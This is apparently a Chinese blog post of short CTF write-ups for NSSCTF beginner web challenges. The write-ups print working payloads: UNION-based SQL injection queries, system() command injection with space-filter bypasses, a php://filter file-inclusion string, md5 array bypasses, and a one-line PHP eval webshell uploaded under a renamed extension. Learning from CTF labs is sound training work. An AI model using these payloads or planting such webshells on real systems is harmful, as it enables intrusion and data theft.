nss第一页

1、[SWPUCTF 2021 新生赛]gift_F12

这题flag藏在前端的源码里,只需要查看源码就好了

最后改成题目所需要的flag形式

2、[SWPUCTF 2021 新生赛]jicao

打开这题,这题是一个php代码审计的题目,然后的话,这里主要来看一下 json_decode 这个函数,

首先这个函数接收两个参数

第一个参数:带解码的JSON字符串

第二个参数:是一个布尔值(默认设置为false),当为true时候,将JSON对象解码为关联数组;当为false的时候结尾为php对象

例如:

$json = json_decode('{"name":"John","age":30}', true);

当第二个参数为true时候,经过json_decode后 :——>Array( [name] => John [age] => 30)

$json = json_decode('{"name":"John","age":30}', false);

当第二个参数为false时候,就得到一个php类,此时就可以通过类调用成员属性,如$ json->name=John

最后的payload:

GET:json={"x":"wllm"}

POST:id=wllmNB

3、[SWPUCTF 2021 新生赛]easy_md5

看到md5就直接用数组绕过了,注意传参方式就行了

payload:

GET:name[]=1

POST:password[]=12

4、[SWPUCTF 2021 新生赛]include

开始提示传一个file进去,用file作为参数然后用get请求传进去就来到上面这个页面

最后看到一个 include_once 函数,就知道要文件包含了,

data协议我用了好像没有反应,最后用?file=php://filter就出来了,最后拿去base64解码

payload:GET:file=php://filter/read=convert.base64-encode/resource=flag.php

5、[SWPUCTF 2021 新生赛]easy_sql

这题是一道sql注入,额,过滤了#号,用--+代替就行了,其他都是常规操作

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

test_tb,users

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='test_tb'--+

id,flag

-1' union select 1,2,flag from test_tb

6、[SWPUCTF 2021 新生赛]easyrce

 

通过url控制eval的参数,所有直接执行系统命令,传入

system('ls /');

payload:?url=system('cat /flllllaaaaaaggggggg');

7、[SWPUCTF 2021 新生赛]caidao

这题打开有个一句话木马,直接蚁剑连接,也可以通过命令执行来拿flag

8、[SWPUCTF 2021 新生赛]Do_you_know_http

这题用bp抓包,然后改user-agent 和 X-Forwarded-For就行了

9、[LitCTF 2023]我Flag呢?

这题直接查看源码就出来了

10、[SWPUCTF 2021 新生赛]babyrce

跟着题目来,在http头传一个cookie:amdin=1(注意cookie中的参数之间用分号隔开),接着就出现了下面这个页面

访问rasalghul.php

最后有个命令执行函数,参数过滤了空格,使用 ${IFS}或者%09绕过空格就行了

最后的payload:rasalghul.php?url=cat%09/flllllaaaaaaggggggg

11、 [第五空间 2021]WebFTP

这用御剑扫描出来了phpinfo.php

然后访问这个文件,最后搜索关键字,nssctf就可以看到flag了·

12、[SWPUCTF 2021 新生赛]easyupload2.0

这题的话直接在文件里放一个马,然后文件名过滤了php后缀,直接改成phtml就行了

最后用蚁剑连接

13、[LitCTF 2023]PHP是世界上最好的语言!!

这题直接复制输出内容就行了

如果有不成功的话就写入

13、[SWPUCTF 2021 新生赛]easyupload1.0

传马:

<?= eval($_POST[1]);?>

改后缀,最后访问

/upload/2.php

命令执行

post:

1=system('cat /var/www/html/flag.php');

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值